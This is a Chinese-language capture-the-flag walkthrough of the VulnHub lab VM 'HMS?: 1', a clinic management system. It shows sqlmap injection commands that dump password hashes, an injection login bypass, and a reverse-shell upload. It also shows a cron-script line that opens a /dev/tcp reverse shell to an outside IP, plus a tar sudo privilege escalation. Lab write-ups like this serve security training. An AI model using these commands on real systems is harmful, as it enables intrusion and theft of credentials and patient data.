- 英文名稱:HMS?: 1
- 中文名稱:嗯?:1
- 釋出日期:2021 年 7 月 28 日
- 難度:容易
- 描述:這适用于 VirtualBox 而不是 VMware
- 下載下傳位址:https://www.vulnhub.com/entry/hms-1,728/
ailx10
網絡安全優秀回答者
網絡安全碩士
去咨詢
1、主機發現(192.168.199.149)
主機發現
2、端口掃描(21、22)
端口掃描
3、匿名登入ftp,發現是空軍,空空如也
匿名登入ftp
4、重新掃描端口(21、22、7080)
nmap -sS 192.168.199.149 -p1-65535 全端口掃描
5、通路頁面
通路頁面
6、burp代理,嘗試通路
burp代理
7、探測是否存在SQL注入
存在SQL注入
8、SQLmap探測
1、探測資料庫
sqlmap -u "http://192.168.199.149:7080/login.php" --data="user=admin&email=ailx10%40qq.com&password=123456&btn_login=" --current-db
current database: 'clinic_db'
2、探測表
sqlmap -u "http://192.168.199.149:7080/login.php" --data="user=admin&email=ailx10%40qq.com&password=123456&btn_login=" -D clinic_db --tables
[24 tables]
+----------------------+
| user |
| admin |
| appointment |
| billing |
| billing_records |
| department |
| doctor |
| doctor_timings |
| manage_website |
| medicine |
| orders |
| patient |
| payment |
| prescription |
| prescription_records |
| room |
| service_type |
| tbl_email_config |
| tbl_permission |
| tbl_permission_role |
| tbl_role |
| tbl_sms_config |
| treatment |
| treatment_records |
+----------------------+
3、探測表結果
sqlmap -u "http://192.168.199.149:7080/login.php" --data="user=admin&email=ailx10%40qq.com&password=123456&btn_login=" -D clinic_db -T admin --columns
Database: clinic_db
Table: admin
[17 columns]
+---------------+---------------+
| Column | Type |
+---------------+---------------+
| addr | varchar(500) |
| created_on | date |
| delete_status | int(11) |
| dob | text |
| fname | varchar(50) |
| gender | varchar(500) |
| id | int(11) |
| image | varchar(2000) |
| last_login | date |
| lname | varchar(500) |
| loginid | varchar(30) |
| mobileno | text |
| notes | varchar(200) |
| password | varchar(100) |
| role_id | int(11) |
| updated_on | date |
| username | varchar(500) |
+---------------+---------------+
4、拖庫
sqlmap -u "http://192.168.199.149:7080/login.php" --data="user=admin&email=ailx10%40qq.com&password=123456&btn_login=" -D clinic_db -T admin -C username,password --dump
Database: clinic_db
Table: admin
[1 entry]
+----------+------------------------------------------------------------------+
| username | password |
+----------+------------------------------------------------------------------+
| admin | aa7f019c326413d5b8bcad4314228bcd33ef557f5d81c7cc977f7728156f4357 |
+----------+------------------------------------------------------------------+
9、同樣的手法,沒有明文
+-----------------+------------------------------------------------------------------+
| doctorname | password |
+-----------------+------------------------------------------------------------------+
| Dr. Akash Ahire | bbcff4db4d8057800d59a68224efd87e545fa1512dfc3ef68298283fbb3b6358 |
+-----------------+------------------------------------------------------------------+
+-------------+------------------------------------------------------------------+
| patientname | password |
+-------------+------------------------------------------------------------------+
| Atul Petkar | bbcff4db4d8057800d59a68224efd87e545fa1512dfc3ef68298283fbb3b6358 |
+-------------+------------------------------------------------------------------+ 10、在burp中嘗試SQL注入的萬能密碼,成功登入
将郵箱換成萬能密碼
成功登入
11、檢視源代碼
檢視源代碼
12、通路頁面
通路頁面
13、上傳反彈shell
上傳反彈shell
14、反彈成功
反彈成功
15、找到普通flag
普通flag
16、尋找特權檔案
find / -perm -u=s -type f -exec ls -al {} \; 2>&1 | grep -v "Permission denied" 尋找特權檔案
17、at 無權限
無權限
18、檢視定時任務
$ cat /home/eren/backup.sh
#!/bin/bash
BACKUP_DIR="/home/eren/backups"
tar -zcvpf $BACKUP_DIR/backup.tar.gz /var/www/html
檢視定時任務
19、切換身份,将反彈shell寫入定時任務,等待5分鐘
echo "bash -i >& /dev/tcp/192.168.199.247/7777 0>&1" >> /home/eren/backup.sh
寫入定時任務
5分鐘後,得到shell
20、tar 提權,獲得root的flag
sudo -u root tar cf /dev/null exploit --checkpoint=1 --checkpoint-action=exec="/bin/bash"
tar 提權
到此,實驗完成~
釋出于 2022-08-28 19:08